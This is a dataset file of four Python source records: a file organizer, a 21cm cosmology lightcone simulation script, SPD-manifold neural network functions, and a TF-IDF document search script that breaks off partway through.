+{"seq_id":"29102857785","text":"from pathlib import Path, 
PosixPath\nfrom typing import List\nfrom enum import Enum\nimport os\nimport errno\nimport shutil\n\nclass OrganizerException(Exception):\n pass\n\nclass Answer(Enum):\n YES = 0\n NO = 1\n SKIP = 2\n LIST = 3\n\ndef AcceptDialog(message=\"Please indicate approval [y/n/s/l/?]: \") -> Answer:\n print(message, end='')\n yes = ['yes', 'y']\n no = ['no', 'n']\n skip = ['s']\n list_files = ['l']\n q = [\"?\"]\n\n answ = \"\"\n while True:\n choice = input().lower()\n if choice in yes:\n return Answer.YES\n if choice in no:\n return Answer.NO\n if choice in list_files:\n return Answer.LIST\n if choice in skip:\n return Answer.SKIP\n if choice in q:\n print(\"\\n\\ty - yes\"\n \"\\n\\tn - no\"\n \"\\n\\ts - skip\"\n \"\\n\\tl - list files\")\n\nclass OrganizerInstance:\n\n def __init__(self, src_dir:Path, out_dir:Path, ext_list:List[str]):\n\n if not (src_dir.exists() and src_dir.is_dir()):\n raise OrganizerException(\"Provided source directory doesn't exist or isn't a directory!\")\n\n self.src_dir = src_dir\n self.out_dir = out_dir\n self.ext_list = [x.lower() for x in ext_list]\n\n\n def organize(self, dry_run:bool=False):\n print(f\"Starting organizing process. dry_run={dry_run}\")\n print(f\"Searching for following extensions: {self.ext_list}\")\n self.parse_dir(self.src_dir, dry_run=dry_run)\n print(\"\\nFiles organized!\")\n\n\n def parse_dir(self, act_dir: Path, dry_run:bool, path_prefix:Path=None):\n dirs_to_parse = []\n files_to_copy = []\n\n for ch in act_dir.iterdir():\n try:\n # Parse child directories later\n if ch.is_dir():\n dirs_to_parse.append(ch)\n continue\n\n # Skip non regular files\n if not ch.is_file():\n continue\n\n if ch.suffix.lower() in self.ext_list:\n files_to_copy.append(ch)\n\n except PermissionError as e:\n print(\"Insufficient permissions\")\n print(e)\n\n if files_to_copy:\n # Prepare path prefix with folder\n initialized_path_prefix = False\n if path_prefix is None:\n initialized_path_prefix = True\n path_prefix = Path(act_dir.resolve().absolute().name or \"root\")\n\n print()\n print(f\"In source directory \\t{act_dir.relative_to(self.src_dir)}\"\n f\"\\n\\tfound {len(files_to_copy)} specified files!\")\n print(f\"Files will be copied to directory: \\t {path_prefix}\")\n\n while True:\n accepted = AcceptDialog()\n if accepted == Answer.LIST:\n print(\"The following files were found:\")\n for file in files_to_copy:\n print(f\"\\t{file}\")\n if accepted == Answer.YES:\n copy_target_dir = self.out_dir / path_prefix\n self.mkdir_p(copy_target_dir, dry_run=dry_run)\n for file in files_to_copy:\n self.copy(file.absolute(), self.out_dir / path_prefix, dry_run=dry_run)\n print(\"Files copied successfully\")\n break\n elif accepted == Answer.NO:\n # Unset path prefix if this is determined to not be the root directory of specified files\n if initialized_path_prefix:\n path_prefix = None\n break\n elif accepted == Answer.SKIP:\n # Skip file copying and recursive directory parsing\n return\n\n for ch_dir in dirs_to_parse:\n new_path_prefix = (path_prefix / ch_dir.name) if path_prefix else None\n self.parse_dir(ch_dir, dry_run, new_path_prefix)\n\n def mkdir_p(self, path: Path, dry_run: bool):\n # TODO: Add statistics\n if dry_run:\n return\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST or os.path.isdir(path):\n pass\n else:\n raise exc\n\n def copy(self, src_file: Path, target: Path, dry_run: bool):\n # TODO: Add statistics\n if dry_run:\n return\n shutil.copy(src_file, 
target)\n\n","repo_name":"PPakalns/fileOrg","sub_path":"src/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27096311556","text":"import numpy as np, os, sys, json, tarfile\nimport tools21cm as t2c, py21cmfast as p2c \n\nfrom datetime import datetime \nfrom skopt.sampler import Lhs\nfrom skopt.space import Space\nfrom glob import glob\nfrom sklearn.decomposition import PCA as sciPCA\n\npath_out = sys.argv[1]\npath_out += '/' if path_out[-1]!='/' else ''\n\nprint(' Starting at: %s' %(datetime.now().strftime('%H:%M:%S')))\n\n\"\"\"\ncoeval_cubes = p2c.run_coeval(\n redshift = 9.0,\n user_params = {\"HII_DIM\": 300, \"BOX_LEN\": 600, \"USE_INTERPOLATION_TABLES\": True, 'N_THREADS': 8},\n cosmo_params = p2c.CosmoParams(SIGMA_8=0.8),\n astro_params = p2c.AstroParams({\"HII_EFF_FACTOR\":20.0}),\n random_seed=12345)\n\n#coeval_cubes[0].brightness_temp_struct.save('%sbox_z9_zeta20.00_tvir5.00_rmfp15.00_21cmFast_brightness_temp_600cMpc.h5' %(path_out))\nnp.save('%sbox_z9_zeta20.00_tvir5.00_rmfp15.00_21cmFast_brightness_temp_600cMpc.npy' %(path_out), coeval_cubes.brightness_temp)\n\n\"\"\"\ntry:\n os.makedirs(path_out)\n os.makedirs(path_out+'data')\n os.makedirs(path_out+'images')\n os.makedirs(path_out+'parameters')\nexcept:\n pass\n\nname_of_the_run = path_out[path_out[:-1].rfind('/')+1:-1]\n\n# Change working directory:\nos.chdir(path_out+'..')\ncwd = os.getcwd()\n\n\n# 21cmFAST parameters\n#uvfile = '/store/ska/sk09/segunet/uvmap_128_z7-20.pkl'\n#uvfile = '/store/ska/sk09/segunet/uvmap_200_z7-35.pkl'\nuvfile = '/store/ska/sk02/lightcones/EOS21/uvmap_1000_z7-11.pkl'\n\n#params = {'HII_DIM':128, 'DIM':512, 'BOX_LEN':256}\nparams = {'HII_DIM':200, 'DIM':600, 'BOX_LEN':300, 'USE_INTERPOLATION_TABLES': False}\nc_params = {'OMm':0.27, 'OMb':0.046, 'SIGMA_8':0.82, 'POWER_INDEX':0.96}\nz_min, z_max = 5.000, 29.999\ntobs = 1000.\nCOMPRESS = False\nMAKE_PLOT = False\n\npath_cache = '/scratch/snx3000/mibianco/21cmFAST-cache/'\np2c.config['direc'] = path_cache\n\nwith open(path_out+'parameters/user_params.txt', 'w') as file:\n file.write(json.dumps(params))\n\nwith open(path_out+'parameters/cosm_params.txt', 'w') as file:\n file.write(json.dumps(c_params))\n\n\n# Start loop\ni, rseed = 0, 2022\nprint(' generated seed:\\t %d' %rseed)\n\n# Latin Hypercube Sampling of parameters\nspace = Space([(10., 100.), (5., 20.), (np.log10(1e4), np.log10(2e5)), (38.0, 42.), (100., 1500.)]) \nlhs_sampling = np.array(Lhs(criterion=\"maximin\", iterations=10000).generate(dimensions=space.dimensions, n_samples=1, random_state=rseed))\neff_fact, Rmfp, Tvir, LX, E0 = lhs_sampling[0]\n\n# Define astronomical parameters\na_params = {'HII_EFF_FACTOR':eff_fact, 'R_BUBBLE_MAX':Rmfp, 'ION_Tvir_MIN':Tvir, 'L_X': LX, 'NU_X_THRESH': E0}\n\nprint(' calculate lightcone...') \nlightcone = p2c.run_lightcone(redshift=z_min, max_redshift=z_max, \n user_params=params, astro_params=a_params, cosmo_params=c_params, \n lightcone_quantities=(\"brightness_temp\", 'xH_box'), \n flag_options={\"USE_TS_FLUCT\": True},\n global_quantities=(\"brightness_temp\", 'xH_box'), \n direc=path_cache, random_seed=rseed) \n\nnp.savetxt('%slc_redshifts.txt' %(path_out), lightcone.lightcone_redshifts, fmt='%.5f')\ndT = lightcone.brightness_temp\nt2c.save_cbin(path_out+'data/xHI_21cm_i%d.bin' %i, lightcone.xH_box)\nt2c.save_cbin(path_out+'data/dT_21cm_i%d.bin' %i, dT)\n\nlc_noise = 
t2c.noise_lightcone(ncells=lightcone.brightness_temp.shape[0], \n zs=lightcone.lightcone_redshifts, \n obs_time=tobs, save_uvmap=uvfile, \n boxsize=params['BOX_LEN'], n_jobs=1)\n\n#print(' calculate foregrounds...')\ngal_fg = t2c.galactic_synch_fg(z=lightcone.lightcone_redshifts, ncells=params['HII_DIM'], boxsize=params['BOX_LEN'], rseed=rseed)\nexgal_fg = t2c.extragalactic_pointsource_fg(z=lightcone.lightcone_redshifts, ncells=params['HII_DIM'], boxsize=params['BOX_LEN'], rseed=rseed)\n\nprint(' calculate dT and mask...') \ndT1 = t2c.subtract_mean_signal(lightcone.brightness_temp, los_axis=2) \ndT2, redshifts = t2c.smooth_lightcone(dT1, z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \ndT3, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \ndT4, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise + gal_fg, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN'])\ndT5, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise + exgal_fg + gal_fg, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN'])\n\nprint(' calculate PCA...')\ndata = dT5\ndata_flat = np.reshape(data, (-1, data.shape[2]))\npca = sciPCA(n_components=7)\ndatapca = pca.fit_transform(data_flat)\npca_FG = pca.inverse_transform(datapca)\ndT5pca = np.reshape(data_flat - pca_FG, (params['HII_DIM'], params['HII_DIM'], data.shape[2]))\n\n#xHI = lightcone.xH_box\nsmt_xn, _ = t2c.smooth_lightcone(lightcone.xH_box, z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \nmask_xH = smt_xn>0.5\n\nprint(' save outputs...') \nt2c.save_cbin(path_out+'data/xH_21cm_i%d.bin' %i, mask_xH)\nt2c.save_cbin(path_out+'data/dT2_21cm_i%d.bin' %i, dT2) # smooth(dT - avrg_dT)\nt2c.save_cbin(path_out+'data/dT3_21cm_i%d.bin' %i, dT3) # smooth(dT + noise - avrg_dT)\nt2c.save_cbin(path_out+'data/dT4_21cm_i%d.bin' %i, dT4) # smooth(dT + noise + gf - avrg_dT)\nt2c.save_cbin(path_out+'data/dT5_21cm_i%d.bin' %i, dT5) # smooth(dT + noise + gf + exgf - avrg_dT)\nnp.save(path_out+'data/dTexgf_21cm_i%d.npy' %i, exgal_fg[..., 0]) # just the point sourcess\nt2c.save_cbin(path_out+'data/dT5pca_21cm_i%d.bin' %i, dT5pca)\n\n# save parameters values\nwith open('%sastro_params.txt' %(path_out+'parameters/'), 'a') as f:\n f.write('# HII_EFF_FACTOR: The ionizing efficiency of high-z galaxies\\n')\n f.write('# R_BUBBLE_MAX: Mean free path in Mpc of ionizing photons within ionizing regions\\n')\n f.write('# ION_Tvir_MIN: Minimum virial Temperature of star-forming haloes in log10 units\\n')\n f.write('#i\\teff_f\\tRmfp\\tTvir\\tseed\\n')\n f.write('%d\\t%.3f\\t%.3f\\t%.3f\\t%d\\n' %(i, eff_fact, Rmfp, Tvir, rseed))\n\n#os.system('rm -r %s' %path_cache)\nprint('... done at %s.' 
%(datetime.now().strftime('%H:%M:%S')))\n","repo_name":"micbia/SegU-Net","sub_path":"utils_data/run_lc.py","file_name":"run_lc.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"4009480700","text":"# -*- coding: utf-8 -*-\n# @Auther : Mingsong Li (lms-07)\n# @Time : 2023-Apr\n# @Address : Time Lab @ SDU\n# @FileName : manifold_learning_fun.py\n# @Project : AMS-M2ESL (HSIC), IEEE TGRS\n\n# based on the source code of RBN, i.e., A Riemannian Network for SPD Matrix Learning, NeurIPS 2019\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function as F\n\n\nclass StiefelParameter(nn.Parameter):\n \"\"\" Parameter constrained to the Stiefel manifold (for BiMap layers) \"\"\"\n pass\n\n\nclass SPDParameter(nn.Parameter):\n \"\"\" Parameter constrained to the SPD manifold (for ParNorm) \"\"\"\n pass\n\n\ndef init_bimap_parameter(W):\n \"\"\" initializes a (ho,hi,ni,no) 4D-StiefelParameter\"\"\"\n # C* = C +λI , where I is the identity matrix, λ could be set to \\alpha× trace(C ), and \\alpha is a very small value like 10^(-6).\n ho, hi, ni, no = W.shape\n for i in range(ho): # can vectorize\n for j in range(hi): # can vectorize\n v = torch.empty(ni, ni, dtype=W.dtype,\n device=W.device).uniform_(0., 1.)\n inp_svd = v.matmul(v.t())\n alpha = 1e-5\n inp_svd = add_id_matrix(inp_svd, alpha)\n # vv = torch.svd(inp_svd)[0][:, :no]\n vv = torch.svd(inp_svd.cpu())[0][:, :no]\n W.data[i, j] = vv.cuda()\n\n\ndef add_id_matrix(P, alpha):\n '''\n Input P of shape (batch_size,1,n,n)\n Add Id\n '''\n P = P + alpha * P.trace() * torch.eye(\n P.shape[-1], dtype=P.dtype, device=P.device)\n return P\n\n\ndef bimap(X, W):\n '''\n Bilinear mapping function\n :param X: Input matrix of shape (batch_size,n_in,n_in)\n :param W: Stiefel parameter of shape (n_in,n_out)\n :return: Bilinearly mapped matrix of shape (batch_size,n_out,n_out)\n '''\n # print(W.dtype)\n # print(X.dtype)\n # print(X.shape)\n # print(W.shape)\n return W.t().float().matmul(X.float()).matmul(W.float())\n\n\ndef bimap_channels(X, W):\n '''\n Bilinear mapping function over multiple input and output channels\n :param X: Input matrix of shape (batch_size,channels_in,n_in,n_in)\n :param W: Stiefel parameter of shape (channels_out,channels_in,n_in,n_out)\n :return: Bilinearly mapped matrix of shape (batch_size,channels_out,n_out,n_out)\n '''\n # Pi=th.zeros(X.shape[0],1,W.shape[-1],W.shape[-1],dtype=X.dtype,device=X.device)\n # for j in range(X.shape[1]):\n # Pi=Pi+bimap(X,W[j])\n batch_size, channels_in, n_in, _ = X.shape\n channels_out, _, _, n_out = W.shape\n P = torch.zeros(batch_size,\n channels_out,\n n_out,\n n_out,\n dtype=X.dtype,\n device=X.device)\n for co in range(channels_out):\n P[:, co, :, :] = sum([\n bimap(X[:, ci, :, :], W[co, ci, :, :]) for ci in range(channels_in)\n ])\n return P\n\n\nclass Re_op():\n \"\"\" Relu function and its derivative \"\"\"\n _threshold = 1e-4\n\n @classmethod\n def fn(cls, S, param=None):\n return nn.Threshold(cls._threshold, cls._threshold)(S)\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (S > cls._threshold).double()\n\n\nclass ReEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of rectified eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_re(P, Re_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, 
dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Re_op)\n\n\ndef BatchDiag(P):\n \"\"\"\n Input P: (batch_size,channels) vectors of size (n)\n Output Q: (batch_size,channels) diagonal matrices of size (n,n)\n \"\"\"\n batch_size, channels, n = P.shape # batch size,channel depth,dimension\n Q = torch.zeros(batch_size, channels, n, n, dtype=P.dtype, device=P.device)\n for i in range(batch_size): # can vectorize\n for j in range(channels): # can vectorize\n Q[i, j] = P[i, j].diag()\n return Q\n\n\ndef modeig_forward_re(P, op, eig_mode='svd', param=None):\n '''\n Generic forward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n batch_size, channels, n, n = P.shape\n U, S = torch.zeros_like(P, device=P.device), torch.zeros(batch_size,\n channels,\n n,\n dtype=P.dtype,\n device=P.device)\n for i in range(batch_size):\n for j in range(channels):\n if (eig_mode == 'eig'):\n s, U[i, j] = torch.linalg.eig(P[i, j], True)\n S[i, j] = s[:, 0]\n elif (eig_mode == 'svd'):\n U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j], 1e-5))\n # U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j].cpu(), 1e-5))\n # U, S = U.cuda(), S.cuda()\n S_fn = op.fn(S, param)\n X = U.matmul(BatchDiag(S_fn)).matmul(U.transpose(2, 3))\n return X, U, S, S_fn\n\n\ndef modeig_forward_etc(P, op, eig_mode='svd', param=None):\n '''\n Generic forward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n batch_size, channels, n, n = P.shape\n U, S = torch.zeros_like(P, device=P.device), torch.zeros(batch_size,\n channels,\n n,\n dtype=P.dtype,\n device=P.device)\n for i in range(batch_size):\n for j in range(channels):\n if (eig_mode == 'eig'):\n # s, U[i, j] = torch.linalg.eig(P[i, j])\n s, U[i, j] = torch.eig(P[i, j].cpu(), True)\n S[i, j] = s[:, 0]\n elif (eig_mode == 'svd'):\n # U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j], 1e-5))\n U[i, j], S[i, j], _ = torch.svd(add_id_matrix(P[i, j].cpu(), 1e-5))\n U, S = U.cuda(), S.cuda()\n S_fn = op.fn(S, param)\n X = U.matmul(BatchDiag(S_fn)).matmul(U.transpose(2, 3))\n return X, U, S, S_fn\n\n\ndef modeig_backward(dx, U, S, S_fn, op, param=None):\n '''\n Generic backward function of non-linear eigenvalue modification\n LogEig, ReEig, etc inherit from this class\n Input P: (batch_size,channels) SPD matrices of size (n,n)\n Output X: (batch_size,channels) modified symmetric matrices of size (n,n)\n '''\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n # print(\"Correct back prop\")\n\n S_fn_deriv = BatchDiag(op.fn_deriv(S, param)).float()\n SS = S[..., None].repeat(1, 1, 1, S.shape[-1])\n SS_fn = S_fn[..., None].repeat(1, 1, 1, S_fn.shape[-1])\n L = (SS_fn - SS_fn.transpose(2, 3)) / (SS - SS.transpose(2, 3))\n L[L == -np.inf] = 0\n L[L == np.inf] = 0\n L[torch.isnan(L)] = 0\n L = L + S_fn_deriv\n dp = L * (U.transpose(2, 3).matmul(dx).matmul(U))\n dp = U.matmul(dp).matmul(U.transpose(2, 3))\n return dp\n\n\nclass Sqm_op():\n \"\"\" sqrt function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return 
torch.sqrt(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return 0.5 / torch.sqrt(S)\n\n\nclass Sqminv_op():\n \"\"\" Inverse sqrt function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return 1 / torch.sqrt(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return -0.5 / torch.sqrt(S) ** 3\n\n\nclass SqmEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of square root eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n # X, U, S, S_fn = modeig_forward_re(P, Sqm_op)\n X, U, S, S_fn = modeig_forward_etc(P, Sqm_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Sqm_op)\n\n\nclass SqminvEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of inverse square root eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_etc(P, Sqminv_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Sqminv_op)\n\n\ndef CongrG(P, G, mode):\n \"\"\"\n Input P: (batch_size,channels) SPD matrices of size (n,n) or single matrix (n,n)\n Input G: matrix (n,n) to do the congruence by\n Output PP: (batch_size,channels) of congruence by sqm(G) or sqminv(G) or single matrix (n,n)\n \"\"\"\n P, G = P.float(), G.float()\n if (mode == 'pos'):\n GG = SqmEig.apply(G[None, None, :, :])\n elif (mode == 'neg'):\n GG = SqminvEig.apply(G[None, None, :, :])\n PP = GG.matmul(P.float()).matmul(GG.float())\n return PP\n\n\nclass Log_op():\n \"\"\" Log function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return torch.log(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return 1 / S\n\n\nclass Re_op():\n \"\"\" Relu function and its derivative \"\"\"\n _threshold = 1e-4\n\n @classmethod\n def fn(cls, S, param=None):\n return nn.Threshold(cls._threshold, cls._threshold)(S)\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (S > cls._threshold).double()\n\n\nclass LogEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of log eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P):\n # X, U, S, S_fn = modeig_forward_re(P, Sqm_op)\n X, U, S, S_fn = modeig_forward_etc(P, Log_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Log_op)\n\n\ndef LogG(x, X):\n \"\"\" Logarithmc mapping of x on the SPD manifold at X \"\"\"\n return CongrG(LogEig.apply(CongrG(x, X, 'neg')), X, 'pos')\n\n\nclass Exp_op():\n \"\"\" Log function and its derivative \"\"\"\n\n @staticmethod\n def fn(S, param=None):\n return torch.exp(S)\n\n @staticmethod\n def fn_deriv(S, param=None):\n return torch.exp(S)\n\n\nclass ExpEig(F):\n \"\"\"\n Input P: (batch_size,h) symmetric matrices of size (n,n)\n Output X: (batch_size,h) of exponential eigenvalues matrices of size (n,n)\n \"\"\"\n\n 
@staticmethod\n def forward(ctx, P):\n X, U, S, S_fn = modeig_forward_etc(P, Exp_op, eig_mode='eig')\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Exp_op)\n\n\nclass Power_op():\n \"\"\" Power function and its derivative \"\"\"\n _power = 1\n\n @classmethod\n def fn(cls, S, param=None):\n return S ** cls._power\n\n @classmethod\n def fn_deriv(cls, S, param=None):\n return (cls._power) * S ** (cls._power - 1)\n\n\nclass PowerEig(F):\n \"\"\"\n Input P: (batch_size,h) SPD matrices of size (n,n)\n Output X: (batch_size,h) of power eigenvalues matrices of size (n,n)\n \"\"\"\n\n @staticmethod\n def forward(ctx, P, power):\n Power_op._power = power\n X, U, S, S_fn = modeig_forward_etc(P, Power_op)\n ctx.save_for_backward(U, S, S_fn)\n return X\n\n @staticmethod\n def backward(ctx, dx):\n # if __debug__:\n # import pydevd\n # pydevd.settrace(suspend=False, trace_only_current_thread=True)\n U, S, S_fn = ctx.saved_variables\n return modeig_backward(dx, U, S, S_fn, Power_op), None\n\n\ndef geodesic(A, B, t):\n '''\n Geodesic from A to B at step t\n :param A: SPD matrix (n,n) to start from\n :param B: SPD matrix (n,n) to end at\n :param t: scalar parameter of the geodesic (not constrained to [0,1])\n :return: SPD matrix (n,n) along the geodesic\n '''\n M = CongrG(PowerEig.apply(CongrG(B.float(), A.float(), 'neg'), t), A, 'pos')[0, 0]\n return M\n\n\ndef ExpG(x, X):\n \"\"\" Exponential mapping of x on the SPD manifold at X \"\"\"\n return CongrG(ExpEig.apply(CongrG(x, X, 'neg')), X, 'pos')\n\n\ndef karcher_step(x, G, alpha):\n '''\n One step in the Karcher flow\n '''\n x_log = LogG(x, G)\n G_tan = x_log.mean(dim=0)[None, ...]\n G = ExpG(alpha * G_tan, G)[0, 0]\n return G\n\n\ndef BaryGeom(x, by_channel=False):\n '''\n Function which computes the Riemannian barycenter for a batch of data using the Karcher flow\n Input x is a batch of SPD matrices (batch_size,1,n,n) to average\n Output is (n,n) Riemannian mean\n '''\n k = 1\n alpha = 1\n batch_size = x.shape[0]\n channels = x.shape[1]\n n = x.shape[2]\n G = []\n if by_channel == True:\n for i in range(batch_size):\n inp = x[i, :, :, :]\n inp = inp.view(channels, 1, x.shape[2], x.shape[3])\n G_sample = torch.mean(inp, dim=0)[0, :, :]\n for _ in range(k):\n G_sample = karcher_step(inp, G_sample, alpha)\n G_sample.view(1, G_sample.shape[0], G_sample.shape[1])\n G.append(G_sample)\n G = torch.cat(G, dim=0)\n G = G.view(batch_size, 1, n, n)\n else:\n # with th.no_grad():\n G = torch.mean(x, dim=0)[0, :, :]\n for _ in range(k):\n G = karcher_step(x, G, alpha)\n return G\n","repo_name":"Candy-CY/Hyperspectral-Image-Classification-Models","sub_path":"AMS-M2ESL/model/module/manifold_learning_fun.py","file_name":"manifold_learning_fun.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"3"} +{"seq_id":"34201494543","text":"#from flask import Flask, render_template, request\nimport re, fileinput, mmap, nltk\nfrom tqdm import tqdm\nfrom termcolor import colored\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nfrom nltk.stem.snowball import SnowballStemmer\n\n#splits the articles\ndef relevance(documents_in):\n \n documents_pre = documents_in.split(\"</article>\") #splits the file into a list at </article>\n for i in 
documents_pre:\n i = re.sub(\"<article name=\", \"\", i)\n i = re.sub(\">\", \"\", i)\n documents.append(i)\n\n return documents\n\ndef test_wcquery(query):\n matches = []\n tfv = TfidfVectorizer(lowercase=True, sublinear_tf=True, use_idf=True, norm=\"l2\", token_pattern=r\"\\b\\w\\w+\\-*\\'*\\w*\\b\")\n global tf_matrix, terms, t2i\n tf_matrix = tfv.fit_transform(documents).T.todense()\n terms = tfv.get_feature_names()\n wc_query = query+\".+\"\n #print(\"wildcard query: \", wc_query)\n\n wc_words = [w for w in terms if re.fullmatch(wc_query, w)]\n #print(\"wc_words: \", wc_words)\n \n if wc_words:\n new_query_string = \" \".join(wc_words)\n #print(\"new_query_string: \", new_query_string)\n query_vec = tfv.transform([new_query_string]).todense()\n #print(\"query_vec: \", query_vec)\n scores = np.dot(query_vec, tf_matrix) \n ranked_scores_and_doc_ids = \\\n sorted([ (score, i) for i, score in enumerate(np.array(scores)[0]) if score > 0], reverse=True)\n #print(\"There are \", len(ranked_scores_and_doc_ids), \" documents matching your query.\")\n\n for score, i in ranked_scores_and_doc_ids:\n score = \"{:.4f}\".format(score)\n snippet_index = documents[i].lower().find(query) #Finds an index for a snippet for printing results.\n header = documents[i].split('\"')[1] #Finds the header of an article for printing results.\n header = str(header)\n snippet = \"...\"+documents[i][snippet_index:snippet_index+100]+\"...\"\n snippet = str(snippet)\n line = \"The score of \" + query + \" is \"+ score + \" in the document named: \" + header + \"\\n\" + \"Here is a snippet: \" + snippet\n #print(\"Line: \", type(line))\n matches.append(line)\n \n else:\n line = \"No matches for wildcard search \" + query\n matches.append(line)\n print()\n \n \n #print(\"query: \" + query + \"\\n document: \" + header + \"\\n snippet: \" + snippet + \"\\n ***\")\n#print(\"The score of \" + query + \" is {:.4f} in the document named: {:s}. 
Here is a snippet: ...{:s}...\\n***\".format(score, header, documents[i][snippet_index:snippet_index+100]))\n #print(matches)\n print(matches)\n return matches\n\n#searches for query \ndef test_query(query):\n matches = []\n \n \"\"\"Creates a matrix and term-to-index dictionary\"\"\"\n \n tfv = TfidfVectorizer(lowercase=True, sublinear_tf=True, use_idf=True, norm=\"l2\", token_pattern=r\"\\b\\w\\w+\\-*\\'*\\w*\\b\")\n global tf_matrix, terms, t2i\n tf_matrix = tfv.fit_transform(documents).T.todense()\n terms = tfv.get_feature_names()\n\n if query in terms:\n t2i = tfv.vocabulary_ # shorter notation: t2i = term-to-index\n hits_list = np.array(tf_matrix[t2i[query]])[0]\n hits_and_doc_ids = [ (hits, i) for i, hits in enumerate(hits_list) if hits > 0 ]\n\n ranked_hits_and_doc_ids = sorted(hits_and_doc_ids, reverse=True)\n\n #cosine similarity:\n query_vec = tfv.transform([query]).todense()\n scores = np.dot(query_vec, tf_matrix) \n ranked_scores_and_doc_ids = \\\n sorted([ (score, i) for i, score in enumerate(np.array(scores)[0]) if score > 0], reverse=True)\n #print(\"There are \", len(ranked_scores_and_doc_ids), \" documents matching your query:\")\n \n for score, i in ranked_scores_and_doc_ids:\n score = \"{:.4f}\".format(score)\n snippet_index = documents[i].lower().find(query) #Finds an index for a snippet for printing results.\n header = documents[i].split('\"')[1] #Finds the header of an article for printing results.\n header = str(header)\n snippet = \"...\"+documents[i][snippet_index:snippet_index+100]+\"...\"\n snippet = str(snippet)\n line = \"The score of \" + query + \" is \"+ score + \" in the document named: \" + header + \"\\n\" + \"Here is a snippet: \" + snippet\n matches.append(line)\n\n else:\n line = \"No matches for search \" + query\n matches.append(line)\n #print(\"query: \" + query + \"\\n document: \" + header + \"\\n snippet: \" + snippet + \"\\n ***\")\n #print(\"The score of \" + query + \" is {:.4f} in the document named: {:s}. 
